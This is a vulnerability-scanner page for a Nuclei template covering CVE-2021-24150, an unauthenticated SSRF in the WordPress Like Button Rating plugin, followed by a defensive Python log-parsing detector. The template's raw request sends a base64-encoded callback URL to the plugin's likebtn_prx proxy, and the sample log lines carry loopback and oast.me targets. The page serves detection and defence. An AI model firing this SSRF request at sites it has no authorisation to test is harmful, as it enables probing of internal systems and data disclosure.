WordPress Like Button Rating <2.6.32 - Server-Side Request Forgery
ID: CVE-2021-24150
Severity: high
Author: theamanrawat
Tags: cve2021,cve,wordpress,wp-plugin,wp,ssrf,wpscan,unauth,likebtn-like-button,likebtn-like-button_project
Description
WordPress Like Button Rating plugin before 2.6.32 is susceptible to server-side request forgery. An attacker can obtain sensitive information, modify data, and/or execute unauthorized operations.
YAML Source
id: CVE-2021-24150

info:
  name: WordPress Like Button Rating <2.6.32 - Server-Side Request Forgery
  author: theamanrawat
  severity: high
  description: |
    WordPress Like Button Rating plugin before 2.6.32 is susceptible to server-side request forgery. An attacker can obtain sensitive information, modify data, and/or execute unauthorized operations.
  impact: |
    An attacker can exploit this vulnerability to make requests to internal resources, potentially leading to unauthorized access or information disclosure.
  remediation: |
    Update the WordPress Like Button Rating plugin to version 2.6.32 or later.
  reference:
    - https://wpscan.com/vulnerability/6bc6023f-a5e7-4665-896c-95afa5b638fb
    - https://wordpress.org/plugins/likebtn-like-button/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24150
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-24150
    cwe-id: CWE-918
    epss-score: 0.02268
    epss-percentile: 0.88473
    cpe: cpe:2.3:a:likebtn-like-button_project:likebtn-like-button:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: likebtn-like-button_project
    product: likebtn-like-button
    framework: wordpress
  tags: cve2021,cve,wordpress,wp-plugin,wp,ssrf,wpscan,unauth,likebtn-like-button,likebtn-like-button_project

http:
  - raw:
      - |
        @timeout: 10s
        GET /wp-admin/admin-ajax.php?action=likebtn_prx&likebtn_q={{base64('http://likebtn.com.oast.me')}}" HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Interactsh Server"

      - type: status
        status:
          - 200
# digest: 490a00463044022062d785f26b255993db9b02c63b3e6952ac699b76a9aa91fc7594bdb74080455602207a13679726bc7630a93e21895b18f83474e5c6a19d3684753b12401328f8b56c:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is run with the Nuclei scanner. It sends a single request to the plugin's admin-ajax proxy action with an Interactsh (oast.me) callback URL as the base64-encoded target, and reports the host as vulnerable when the response has HTTP status 200 and its body contains "Interactsh Server".
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-24150.yaml"
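For defenders who want to look for this pattern in their own web server logs rather than only scan for it, the following added example (not part of the Nuclei template or of the likebtn plugin) parses constructed access-log lines, finds requests to the `likebtn_prx` action, base64-decodes the `likebtn_q` target the way a lenient decoder would (dropping stray characters such as the trailing quote in the template's request), and flags targets that are internal addresses or that are not `likebtn.com` hosts. That `likebtn.com` is the proxy's only legitimate destination is an assumption drawn from the template's `likebtn.com.oast.me` payload; the suffix-based host check it demonstrates is the kind of validation that rejects such look-alike hosts, where a substring check would not.

```python
# Added example (not from the Nuclei template or the likebtn plugin): scan web
# server access logs for requests to the plugin's likebtn_prx proxy action and
# flag any whose base64-encoded likebtn_q target is not a likebtn.com host or
# points at an internal address. That likebtn.com is the intended proxy
# target is an assumption drawn from the template's payload.
import base64
import ipaddress
import re
from urllib.parse import unquote, urlsplit

# Assumption: the proxy should only ever reach likebtn.com or its subdomains.
# Matching the exact host or a ".likebtn.com" suffix (not a substring)
# rejects look-alikes such as likebtn.com.oast.me.
ALLOWED_HOSTS = ("likebtn.com",)

# Request line of a common/combined-format access log (constructed samples below).
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')


def host_allowed(host):
    host = host.lower().rstrip(".")
    return any(host == h or host.endswith("." + h) for h in ALLOWED_HOSTS)


def is_internal(host):
    """True when the host is an IP literal in a loopback, private or link-local range."""
    try:
        ip = ipaddress.ip_address(host.strip("[]"))
    except ValueError:
        return False
    return ip.is_loopback or ip.is_private or ip.is_link_local


def query_params(query):
    """Split a query string without turning '+' into a space, so base64 survives."""
    params = {}
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        params.setdefault(unquote(key), unquote(value))
    return params


def decode_target(encoded):
    """Decode likebtn_q the way a lenient base64 decoder does: drop characters
    outside the base64 alphabet (e.g. a trailing quote), then fix the padding."""
    clean = "".join(c for c in encoded if c.isalnum() or c in "+/")
    clean += "=" * (-len(clean) % 4)
    try:
        return base64.b64decode(clean).decode("utf-8", "replace")
    except ValueError:
        return None


def classify_request(line):
    """Return (verdict, decoded_target) for a likebtn_prx request, else None.
    Verdicts: 'ok', 'ssrf-internal', 'ssrf-external', 'undecodable'."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not url.path.endswith("/wp-admin/admin-ajax.php"):
        return None
    params = query_params(url.query)
    if params.get("action") != "likebtn_prx":
        return None
    encoded = params.get("likebtn_q", "")
    target = decode_target(encoded)
    if target is None:
        return ("undecodable", encoded)
    host = (urlsplit(target).hostname or "").lower()
    if is_internal(host):
        return ("ssrf-internal", target)
    if not host_allowed(host):
        return ("ssrf-external", target)
    return ("ok", target)


def find_ssrf_attempts(lines):
    """Return (verdict, target) pairs for every likebtn_prx request that is not 'ok'."""
    hits = []
    for line in lines:
        result = classify_request(line)
        if result and result[0] != "ok":
            hits.append(result)
    return hits


def _b64(url):
    return base64.b64encode(url.encode()).decode()


# Constructed sample log lines (not real traffic); the second one carries the
# trailing %22 (a quote) that the template's request line also has.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /wp-admin/admin-ajax.php?action=likebtn_prx&likebtn_q=%s HTTP/1.1" 200 512' % _b64("https://likebtn.com/api/"),
    '203.0.113.7 - - [01/Jan/2024:10:00:01 +0000] "GET /wp-admin/admin-ajax.php?action=likebtn_prx&likebtn_q=%s%%22 HTTP/1.1" 200 128' % _b64("http://likebtn.com.oast.me"),
    '203.0.113.7 - - [01/Jan/2024:10:00:02 +0000] "GET /wp-admin/admin-ajax.php?action=likebtn_prx&likebtn_q=%s HTTP/1.1" 200 3021' % _b64("http://127.0.0.1/"),
    '198.51.100.2 - - [01/Jan/2024:10:00:03 +0000] "GET /wp-login.php HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for verdict, target in find_ssrf_attempts(SAMPLE_LOG):
        print(verdict, target)
```

Run against the constructed lines, the script reports the oast.me callback as `ssrf-external` and the loopback target as `ssrf-internal`, while the request to `likebtn.com` itself passes. The query string is split without `+`-to-space conversion so the base64 value is preserved, and the decoder tolerates stray characters for the same reason a lenient server-side decoder would, which is exactly why matching on the decoded host, not on the raw parameter, is what the detection has to do.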